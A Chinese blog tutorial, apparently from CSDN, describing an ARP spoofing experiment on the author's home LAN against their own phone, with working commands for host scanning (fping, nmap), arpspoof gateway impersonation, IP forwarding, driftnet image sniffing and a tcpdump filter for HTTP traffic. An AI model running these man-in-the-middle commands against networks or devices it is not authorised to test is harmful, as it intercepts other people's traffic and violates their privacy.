局域网ARP欺骗

局域网ARP欺骗

  使用Ubuntu与我的手机做实验, 欺骗路由器将回应手机的信息发到Ubuntu中去, 再进行抓包分析等,主要用于开发.


1.发现目标IP

  可使用arp-scan -l或fpring(高级版ping)
  如下使用fpring, 基本用法: fping批量扫描主机

fping -g -r 0 -s 192.168.0.0/24

  结果得到5个状态为active, 去掉网关与Ubuntu的IP, 手机的IP为剩下的3个中的一个:
这里写图片描述

2.系统检测

  使用NMap,也就是Network Mapper,是Linux下的网络扫描和嗅探工具包;基本用法:nmap命令—–基础用法
  如果需要下载最新版的,到Downloading Nmap中下载一个rpm包放到Ubuntu中,并不进行检测依赖关系的情况下进行安装rpm -ivh --nodeps nmap-7.70-1.x86_64.rpm;也可以直接apt install nmap.
  对3个IP进行系统检测:

nmap -T4 -O 192.168.0.107 192.168.0.115 192.168.0.103

  当3个都检测成功时(3 hosts up), 执行结果如下:
  这里写图片描述
  当hosts up不完整的时候,重新执行检测命令再次检测,直至成功.由大概可知我的手机局域网的IP为192.168.0.103

3.ARP欺骗

  安装linux 嗅探工具 dsniff: apt install dsniff
  dsniff的基本用法: dsniff 和 Ettercap 和 bettercap 详解 - 网络嗅探工具包
  
  双向欺骗:

arpspoof -i ens33 -t 192.168.0.103 192.168.0.1
arpspoof -i ens33 -t 192.168.0.1 192.168.0.103

  在开启了端口转发, 我的手机也无法上网,此时双向不成功,应使用单向欺骗,只令Ubuntu冒充网关:

arpspoof -i ens33 -t 192.168.0.103 192.168.0.1

4.开启端口转发 

  在不开启端口转发的时候,ARP欺骗只会令手机无法上网;此时应开启端口转发,使手机可以访问外网,如下:

echo 1 > /proc/sys/net/ipv4/ip_forward

5.图片嗅探

apt install driftnet
driftnet

6.抓HTTP包

tcpdump -i ens33  tcp[20:2]=0x4745 or tcp[20:2]=0x4854 -A and dst host 192.168.0.103
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值